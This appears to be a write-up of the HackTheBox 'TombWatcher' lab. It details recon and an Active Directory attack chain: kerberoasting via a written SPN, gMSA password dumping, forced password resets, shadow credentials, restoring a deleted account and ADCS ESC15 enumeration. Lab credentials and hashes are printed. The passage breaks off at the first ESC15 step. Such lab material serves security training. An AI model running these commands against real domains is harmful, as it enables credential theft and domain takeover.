HTB | TombWatcher

Machine - https://app.hackthebox.com/machines/TombWatcher

IP - 10.129.13.255

Machine Information - As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

NMAP

└─$ nmap -sT -p- --min-rate 10000 10.129.13.255 -Pn -oA nmap_ports                                                        
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-08 11:59 IST
Nmap scan report for 10.129.13.255
Host is up (0.61s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49677/tcp open  unknown
49678/tcp open  unknown
49679/tcp open  unknown
49695/tcp open  unknown
49701/tcp open  unknown
49739/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 257.02 seconds

└─$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49677,49678,49679,49695,49701,49739 10.129.13.255 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-08 12:12 IST
Nmap scan report for 10.129.13.255
Host is up (0.59s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-08 10:42:30Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-06-08T10:44:11+00:00; +4h00m00s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T10:44:09+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T10:44:10+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T10:44:09+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
49739/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-08T10:43:29
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 3h59m58s, deviation: 0s, median: 3h59m58s

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 114.75 seconds
                                                              

Port 53

└─$ dig ANY @10.129.13.255 tombwatcher.htb

; <<>> DiG 9.20.8-6-Debian <<>> ANY @10.129.13.255 tombwatcher.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54208
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;tombwatcher.htb.               IN      ANY

;; ANSWER SECTION:
tombwatcher.htb.        600     IN      A       10.129.13.255
tombwatcher.htb.        3600    IN      NS      dc01.tombwatcher.htb.
tombwatcher.htb.        3600    IN      SOA     dc01.tombwatcher.htb. hostmaster.tombwatcher.htb. 250 900 600 86400 3600
tombwatcher.htb.        600     IN      AAAA    dead:beef::e7e7:fbeb:fe8d:9099

;; ADDITIONAL SECTION:
dc01.tombwatcher.htb.   1200    IN      A       10.129.13.255
dc01.tombwatcher.htb.   1200    IN      AAAA    dead:beef::e7e7:fbeb:fe8d:9099

;; Query time: 375 msec
;; SERVER: 10.129.13.255#53(10.129.13.255) (TCP)
;; WHEN: Sun Jun 08 12:22:45 IST 2025
;; MSG SIZE  rcvd: 198

Port 80

We can run auxiliary/scanner/http/iis_shortname_scanner to check for shortname in IIS

msf6 > use auxiliary/scanner/http/iis_shortname_scanner
msf6 auxiliary(scanner/http/iis_shortname_scanner) > set rhosts 10.129.13.255
rhosts => 10.129.13.255
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run
[*] Running module against 10.129.13.255

[*] Scanning in progress...
[+] Found 1 directories
[+] <http://10.129.13.255/aspnet*~1>
[*] No files were found
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/iis_shortname_scanner) > 

on running dirsearch

└─$ dirsearch -u <http://10.129.13.255/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/anurag/htb/TombWatcher/reports/http_10.129.13.255/__25-06-08_12-26-32.txt

Target: <http://10.129.13.255/>

[12:26:33] Starting: 
[12:27:45] 301 -  158B  - /aspnet_client  ->  <http://10.129.13.255/aspnet_client/>
[12:28:16] 400 -    3KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[12:28:36] 400 -    3KB - /jolokia/exec/java.lang:type=Memory/gc            
[12:28:36] 400 -    3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage    
[12:28:36] 400 -    3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[12:28:36] 400 -    3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[12:28:36] 400 -    3KB - /jolokia/write/java.lang:type=Memory/Verbose/true 
                                                                             
Task Completed

We saw similar /aspnet_client/ on our is scanner let’s add this to the path and run again

msf6 auxiliary(scanner/http/iis_shortname_scanner) > set path /aspnet_client/
path => /aspnet_client/
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run
[*] Running module against 10.129.13.255

[*] Scanning in progress...
[+] Found 1 directories
[+] <http://10.129.13.255/aspnet_client/system*~1>
[*] No files were found
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/iis_shortname_scanner) > 

Let’s fuzz for system*~1, and for that let’s make the wordlist

└─$ grep "^system" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > system_fuzz.txt

Let’s fuzz

└─$ wfuzz -c -w system_fuzz.txt -u <http://10.129.13.255/aspnet_client/FUZZ> --hc 404 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: <http://10.129.13.255/aspnet_client/FUZZ>
Total requests: 40

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                                                      
=====================================================================

000000004:   301        1 L      10 W       169 Ch      "system_web"                                                                                                                                                                                                 

Total time: 0
Processed Requests: 40
Filtered Requests: 39
Requests/sec.: 0

add this to the path and run the is scanner

msf6 auxiliary(scanner/http/iis_shortname_scanner) > set path /aspnet_client/system_web/
path => /aspnet_client/system_web/
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run
[*] Running module against 10.129.13.255

[*] Scanning in progress...
[-] Unable to connect to 10.129.13.255
[-] Unable to connect to 10.129.13.255
[+] Found 1 directories
[+] <http://10.129.13.255/aspnet_client/system_web/4_0_30*~1>
[*] No files were found
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/iis_shortname_scanner) > 

BloodHound

Since we have the credentials, let’s use Bloodhound

└─$ bloodhound-python -u henry -p 'H3nry_987TGV!'  -d tombwatcher.htb -ns 10.129.13.255 -c All --zip

Foothold/shell

Shell as John

WriteSPN

We found that henry@tombwatcher.htb -> WriteSPN -> Alfred@tombwatcher.htb

The user HENRY@TOMBWATCHER.HTB has the ability to write to the "serviceprincipalname" attribute to the user ALFRED@TOMBWATCHER.HTB.

So let’s set the SPN for Alfred

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u henry -p 'H3nry_987TGV!' set object 'Alfred' servicePrincipalName -v 'anurag/htb'
[+] Alfred's servicePrincipalName has been updated

Now we can perform kerberoasting

└─$ netexec ldap tombwatcher.htb -u henry -p 'H3nry_987TGV!' --kerberoasting kerberoast.txt

OR

└─$ impacket-GetUserSPNs -request tombwatcher.htb/henry:'H3nry_987TGV!' -dc-ip 10.129.13.255

Let’s use hashcat for cracking

└─$ hashcat kerberoast.txt /home/anurag/stuff/rockyou.txt

Now we have Alfred’s password

Looking back on Bloodhound, we get Alfred@tombwatcher.htb -> AddSelf -> Infrastructure@tombwatcher.htb

The user ALFRED@TOMBWATCHER.HTB has the ability to add itself, to the group INFRASTRUCTURE@TOMBWATCHER.HTB. Because of security group delegation, the members of a security group have the same privileges as that group.

By adding itself to the group, ALFRED@TOMBWATCHER.HTB will gain the same privileges that INFRASTRUCTURE@TOMBWATCHER.HTB already has.

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u Alfred -p "basketball" add groupMember Infrastructure 'Alfred'
[+] Alfred added to Infrastructure

ReadGMSAPassword

Infrastructure@tombwather.htb -> ReadGMSAPassword -> Ansible_dev@tombwatcher.htb

ANSIBLE_DEV$@TOMBWATCHER.HTB is a Group Managed Service Account. The group INFRASTRUCTURE@TOMBWATCHER.HTB can retrieve the password for the GMSA ANSIBLE_DEV$@TOMBWATCHER.HTB.

Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is mananaged by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).

The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.

Since we are the member of the group Infrastructure we should be able to read ansible_dev$'s GMSA Managed Password

there are two ways from which we can get the password

• to clone gMSADumper and run

└─$ python3 gMSADumper.py -u Alfred -p basketball -d "tombwatcher.htb"                                                           
Users or groups who can read password for ansible_dev$:
 > Infrastructure
ansible_dev$:::1c37d00093dc2a5f25176bf2d474afdc
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223f82cd8d39b0e767f0061fd9a

• to use bloodyad

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u Alfred -p "basketball" get object --resolve-sd 'ansible_dev$' --attr msDS-ManagedPassword

distinguishedName: CN=ansible_dev,CN=Managed Service Accounts,DC=tombwatcher,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:1c37d00093dc2a5f25176bf2d474afdc
msDS-ManagedPassword.B64ENCODED: IIwfpSnxGqOGf+d99xuIBTCl3yqtm6fvywv4pBqe5PN9jsYcLAWn3x1doYf9ZzjBXGB3XoRzPFNwtajDOG304xGmN2CJ4G+5QsLACGGVvu3ZoG4aosUdfpEGuWyYqSyKggtxHtssw1lWLbrZayfWqascdDtBvuaszTpJgmDnLykE6QP+BmmngEkfETLuZ+hH0pP896TujqasQXFyOBkqwVtvXe1Lx9szud4//XTPoejE0KBihHGhzmbQ8pGH9QR9zl21XsohXJA2dd9QAUwgGpCssBhbOPtAalPoaOYDlBE4wrFZNnrYpADsIeYVO/HmXVnGO1e/9XRjcSCEZaHvTw==

Now we have NTLM hash of ansible_dev

ForceChangePassword

Ansible_DEV$@rombwatcher.htb -> ForceChangePassword -> Sam@tombwatcher.htb

The user ANSIBLE_DEV$@TOMBWATCHER.HTB has the capability to change the user SAM@TOMBWATCHER.HTB's password without knowing that user's current password.

Let’s change the password

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u ansible_dev$ -p :1c37d00093dc2a5f25176bf2d474afdc set password sam "P@ssw0rd@123"
[+] Password changed successfully!

WriteOwner

Sam@tombwatcher.htb -> WriteOwner -> John@tombwatcher.htb

The user SAM@TOMBWATCHER.HTB has the ability to modify the owner of the user JOHN@TOMBWATCHER.HTB.

Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.

Let’s set the owner to SAM

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "sam" -p "P@ssw0rd@123" set owner john sam                            
[+] Old owner S-1-5-21-1392491010-1358638721-2126982587-512 is now replaced by sam on john

Shadow Credential

Next, let's give ourselves genericAll permissions on John

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "sam" -p "P@ssw0rd@123" add genericAll John Alfred
[+] Alfred has now GenericAll on John

Now we can perform shadow credential to get john’s cred

└─$ certipy shadow auto -account 'john' -u 'alfred@tombwatcher.htb' -p 'basketball' -dc-ip 10.129.13.255
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'john'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b08a3fff-008b-4d2f-16a6-313993ac1d8e'
[*] Adding Key Credential with device ID 'b08a3fff-008b-4d2f-16a6-313993ac1d8e' to the Key Credentials for 'john'
[*] Successfully added Key Credential with device ID 'b08a3fff-008b-4d2f-16a6-313993ac1d8e' to the Key Credentials for 'john'
[*] Authenticating as 'john' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'john@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'john.ccache'
[*] Wrote credential cache to 'john.ccache'
[*] Trying to retrieve NT hash for 'john'
[*] Restoring the old Key Credentials for 'john'
[*] Successfully restored the old Key Credentials for 'john'
[*] NT hash for 'john': ad9324754583e3e42b55aad4d3b8d2bf

Now we can winrm via hash

and get the user.txt

Privilege Escalation

John@tombwatcher.htb -> GenericAll -> ADCS@tombwatcher.htb

The user JOHN@TOMBWATCHER.HTB has GenericAll privileges to the OU ADCS@TOMBWATCHER.HTB.

This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.

I will check this later (might be able to get us somewhere)

Tombstone

What are Tombstones in Active Directory?

When you delete an object from the Active Directory (AD) database, it’s marked as a tombstone object instead of being fully removed. By default, each tombstone object remains in the database for 180 days. Once this tombstone’s lifetime value is exceeded, the tombstone object is automatically deleted by the garbage collection process. Administrators can change the default tombstone lifetime value by using the ADSI Edit tool.

refers to this article

*Evil-WinRM* PS C:\\Users\\john\\Desktop> Get-ADObject -Filter {isDeleted -eq $True -and name -ne "Deleted Objects"} -IncludeDeletedObjects -Properties *

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                                  DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
CN                              : cert_admin
                                  DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
codePage                        : 0
countryCode                     : 0
Created                         : 11/15/2024 7:55:59 PM
createTimeStamp                 : 11/15/2024 7:55:59 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=cert_admin\\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {11/15/2024 7:56:05 PM, 11/15/2024 7:56:02 PM, 12/31/1600 7:00:01 PM}
givenName                       : cert_admin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 11/15/2024 7:57:59 PM
modifyTimeStamp                 : 11/15/2024 7:57:59 PM
msDS-LastKnownRDN               : cert_admin
Name                            : cert_admin
                                  DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1109
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133761921597856970
sAMAccountName                  : cert_admin
sDRightsEffective               : 7
sn                              : cert_admin
userAccountControl              : 66048
uSNChanged                      : 12975
uSNCreated                      : 12844
whenChanged                     : 11/15/2024 7:57:59 PM
whenCreated                     : 11/15/2024 7:55:59 PM

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                                  DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
CN                              : cert_admin
                                  DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
codePage                        : 0
countryCode                     : 0
Created                         : 11/16/2024 12:04:05 PM
createTimeStamp                 : 11/16/2024 12:04:05 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=cert_admin\\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {11/16/2024 12:04:18 PM, 11/16/2024 12:04:08 PM, 12/31/1600 7:00:00 PM}
givenName                       : cert_admin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 11/16/2024 12:04:21 PM
modifyTimeStamp                 : 11/16/2024 12:04:21 PM
msDS-LastKnownRDN               : cert_admin
Name                            : cert_admin
                                  DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : c1f1f0fe-df9c-494c-bf05-0679e181b358
objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1110
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133762502455822446
sAMAccountName                  : cert_admin
sDRightsEffective               : 7
sn                              : cert_admin
userAccountControl              : 66048
uSNChanged                      : 13171
uSNCreated                      : 13161
whenChanged                     : 11/16/2024 12:04:21 PM
whenCreated                     : 11/16/2024 12:04:05 PM

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
CN                              : cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
codePage                        : 0
countryCode                     : 0
Created                         : 11/16/2024 12:07:04 PM
createTimeStamp                 : 11/16/2024 12:07:04 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=cert_admin\\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {11/16/2024 12:07:10 PM, 11/16/2024 12:07:08 PM, 12/31/1600 7:00:00 PM}
givenName                       : cert_admin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 11/16/2024 12:07:27 PM
modifyTimeStamp                 : 11/16/2024 12:07:27 PM
msDS-LastKnownRDN               : cert_admin
Name                            : cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1111
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133762504248946345
sAMAccountName                  : cert_admin
sDRightsEffective               : 7
sn                              : cert_admin
userAccountControl              : 66048
uSNChanged                      : 13197
uSNCreated                      : 13186
whenChanged                     : 11/16/2024 12:07:27 PM
whenCreated                     : 11/16/2024 12:07:04 PM

Remember to find the LASTEST deleted object as the other objects will have had their permissions revoked.

We can find the object cert_admin let's bring it back to life!

*Evil-WinRM* PS C:\\Users\\john\\Desktop> Restore-ADObject -Identity "CN=cert_admin\\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"
*Evil-WinRM* PS C:\\Users\\john\\Desktop> 

GenericAll

Let’s check what permissions we have on cert_admin

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u john -p :ad9324754583e3e42b55aad4d3b8d2bf get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=tombwatcher,DC=htb
permission: WRITE

distinguishedName: CN=john,CN=Users,DC=tombwatcher,DC=htb
permission: WRITE

distinguishedName: OU=ADCS,DC=tombwatcher,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE

distinguishedName: CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE

We have genericAll on cert_admin

Let’s use shadow credentail to get the hash

Shadow Credential

└─$ certipy shadow auto -account 'cert_admin' -u 'john@tombwatcher.htb' -hashes ad9324754583e3e42b55aad4d3b8d2bf -dc-ip 10.129.13.255
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'cert_admin'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'a7db0ca8-580f-88c1-6ac9-5692216a9609'
[*] Adding Key Credential with device ID 'a7db0ca8-580f-88c1-6ac9-5692216a9609' to the Key Credentials for 'cert_admin'
[*] Successfully added Key Credential with device ID 'a7db0ca8-580f-88c1-6ac9-5692216a9609' to the Key Credentials for 'cert_admin'
[*] Authenticating as 'cert_admin' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'cert_admin@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'cert_admin.ccache'
[*] Wrote credential cache to 'cert_admin.ccache'
[*] Trying to retrieve NT hash for 'cert_admin'
[*] Restoring the old Key Credentials for 'cert_admin'
[*] Successfully restored the old Key Credentials for 'cert_admin'
[*] NT hash for 'cert_admin': f87ebf0febd9c4095c68a88928755773

Now we have hash for cert_admin

ESC 15

Now we can check for a vulnerable template

└─$ certipy find -u cert_admin -hashes :f87ebf0febd9c4095c68a88928755773 -target 10.129.13.255 -text -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : tombwatcher-CA-1
    DNS Name                            : DC01.tombwatcher.htb
    Certificate Subject                 : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
    Certificate Serial Number           : 3428A7FC52C310B2460F8440AA8327AC
    Certificate Validity Start          : 2024-11-16 00:47:48+00:00
    Certificate Validity End            : 2123-11-16 00:57:48+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : TOMBWATCHER.HTB\\Administrators
      Access Rights
        ManageCa                        : TOMBWATCHER.HTB\\Administrators
                                          TOMBWATCHER.HTB\\Domain Admins
                                          TOMBWATCHER.HTB\\Enterprise Admins
        ManageCertificates              : TOMBWATCHER.HTB\\Administrators
                                          TOMBWATCHER.HTB\\Domain Admins
                                          TOMBWATCHER.HTB\\Enterprise Admins
        Enroll                          : TOMBWATCHER.HTB\\Authenticated Users
Certificate Templates
  0
    Template Name                       : WebServer
    Display Name                        : Web Server
    Certificate Authorities             : tombwatcher-CA-1
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-16T00:57:49+00:00
    Template Last Modified              : 2024-11-16T17:07:26+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : TOMBWATCHER.HTB\\Domain Admins
                                          TOMBWATCHER.HTB\\Enterprise Admins
                                          TOMBWATCHER.HTB\\cert_admin
      Object Control Permissions
        Owner                           : TOMBWATCHER.HTB\\Enterprise Admins
        Full Control Principals         : TOMBWATCHER.HTB\\Domain Admins
                                          TOMBWATCHER.HTB\\Enterprise Admins
        Write Owner Principals          : TOMBWATCHER.HTB\\Domain Admins
                                          TOMBWATCHER.HTB\\Enterprise Admins
        Write Dacl Principals           : TOMBWATCHER.HTB\\Domain Admins
                                          TOMBWATCHER.HTB\\Enterprise Admins
        Write Property Enroll           : TOMBWATCHER.HTB\\Domain Admins
                                          TOMBWATCHER.HTB\\Enterprise Admins
                                          TOMBWATCHER.HTB\\cert_admin
    [+] User Enrollable Principals      : TOMBWATCHER.HTB\\cert_admin
    [!] Vulnerabilities
      ESC15                             : Enrollee supplies subject and schema version is 1.
    [*] Remarks
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.

We can see ESC15, let’s exploit

ESC15, also known by the community name "EKUwu" (research by Justin Bollinger from TrustedSec) and tracked as CVE-2024-49019, describes a vulnerability affecting unpatched CAs. It allows an attacker to inject arbitrary Application Policies into a certificate issued from a Version 1 (Schema V1) certificate template. If the CA has not been updated with the relevant security patches (Nov 2024), it will incorrectly include these attacker-supplied Application Policies in the issued certificate. This occurs even if these policies are not defined in, or are inconsistent with, the template's intended Extended Key Usages (EKUs), thereby granting the certificate unintended capabilities.

Step 1: Request a certificate, injecting "Client Authentication" Application Policy and target UPN.

